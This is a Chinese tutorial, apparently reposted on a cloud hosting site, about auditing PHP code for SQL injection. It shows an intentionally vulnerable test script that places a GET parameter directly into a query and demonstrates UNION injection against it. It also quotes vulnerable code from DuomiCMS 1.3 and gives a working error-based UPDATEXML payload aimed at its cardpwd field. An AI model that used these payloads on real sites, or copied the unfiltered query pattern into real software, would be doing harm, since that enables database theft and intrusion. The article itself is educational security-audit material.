温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
获取短信验证码
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》
登 录 注册有礼
云服务器 香港服务器 高防服务器
最新更新 网站标签 地图导航
产品
产品
热门
云服务器
高防服务器
裸金属服务器
轻量应用服务器
高防IP
高防CDN
查看全部产品

售前咨询:400-100-2938

计算
云服务器
裸金属服务器
轻量应用服务器
GPU服务器
机柜租用
云电脑
安全
高防服务器
高防IP
高防CDN
高防DNS云解析
SSL证书
数据库
云数据库MySQL
云数据库Redis
云数据库MongoDB
云数据库Memcached
网络和加速
CDN云加速
全站加速
负载均衡SLB
对象储存OSS
SD-WAN
企业服务
短信服务
腾讯企点

PHP代码审计SQL注入篇

发布时间:2020-06-23 11:53:29 阅读:1918 作者:jzking121 栏目:数据库
PHP开发者专用服务器限时活动,0元免费领,库存有限,领完即止! 点击查看>>

什么是SQL注入

SQL注入***(SQL Injection),简称注入***,是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。

而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使***者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将***者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了***者精心构造的恶意代码。

SQL注入实例

很多Web开发者没有意识到SQL查询是可以被篡改的,从而把SQL查询当作可信任的命令。殊不知,SQL查询是可以绕开访问控制,从而绕过身份验证和权限检查的。更有甚者,有可能通过SQL查询去运行主机系统级的命令。

下面将通过一些真实的例子来详细讲解SQL注入的方式。

 PHP代码审计SQL注入篇
 

测试代码如下:

<?php$uid=$_GET['id']; $sql="SELECT * FROM userinfo where id=$uid";$conn=mysql_connect ('localhost','root','root');mysql_select_db("sql",$conn);$result=mysql_query($sql,$conn);print_r('当前SQL语句: '.$sql.' 结果: ');print_r(mysql_fetch_row($result));?>
PHP代码审计SQL注入篇
 
首先我们看一下代码:
$uid=$_GET['id']; //获取GET值
$sql="SELECT * FROM userinfo where id=$uid"; //执行SQL语句
$conn=mysql_connect ('localhost','root','root');mysql_select_db("sql",$conn); //数据库配配置
$result=mysql_query($sql,$conn); //进行查询SQL语句
print_r('当前SQL语句: '.$sql.' 结果: ');print_r(mysql_fetch_row($result)); //进行打印输出没有任何的过滤所以利用简单的SQL注入语句就可以直接查询相关需要的信息。
PHP代码审计SQL注入篇
 
从截图可以看出原本的SQL语句已被注入更改,使用了UNION查询到当前用户。

另外一个多米CMS最新版1.3版本注入实例。
漏洞文件member/mypay.php(14-40行)
if(empty($_SESSION['duomi_user_id'])){    showMsg("请先登录","login.php");    exit();}elseif($dm=='mypay'){    $key=$_POST['cardkey'];    if($key==""){showMsg("请输入充值卡号","-1");exit;}    $pwd=$_POST['cardpwd'];    if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}    $sqlt="SELECT * FROM duomi_card where ckey='$key'";    $sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";       $row1 = $dsql->GetOne($sqlt);    if(!is_array($row1) OR $row1['status']<>0){        showMsg("充值卡信息有误","-1");exit;    }else{        $uname=$_SESSION['duomi_user_name'];        $points=$row1['climit'];        $dsql->executeNoneQuery("UPDATE duomi_card SET    usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");        $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");        $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");        showMsg("恭喜!充值成功!","mypay.php");exit;    }}else{

此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下(注意此处需要注册用户并且登陆详情请看该文件1-17行):
http://localhost/member/mypay.php?dm=mypayPOST:cardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1

PHP代码审计SQL注入篇
 



来自为知笔记(Wiz)


亿速云「云服务器」,即开即用、新一代英特尔至强铂金CPU、三副本存储NVMe SSD云盘,价格低至29元/月。点击查看>>

向AI问一下细节
推荐阅读:
  1. PHP代码审计教程
  2. php connect 篇

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

style color normal

猜你喜欢

最新资讯
相关推荐
开发者交流群:
php开发者交流-19群

相关标签

currentstyle style标签 list-style stylus font-style list-style-image styled-components stylelint uicolor background-color colorbar colormap currentcolor
AI

产品服务
地区划分
专题活动
帮助支持
关于我们
售后咨询
7*24小时在线电话:400-100-2938
7*24小时在线 QQ:800811969
关注亿速云

亿速云公众号

手机网站二维码

Copyright © Yisu Cloud Ltd. All Rights Reserved. 2018 版权所有

广州亿速云计算有限公司粤ICP备17096448号-1 粤公网安备 44010402001142号增值电信业务经营许可证编号:B1-20181529

开发者交流群×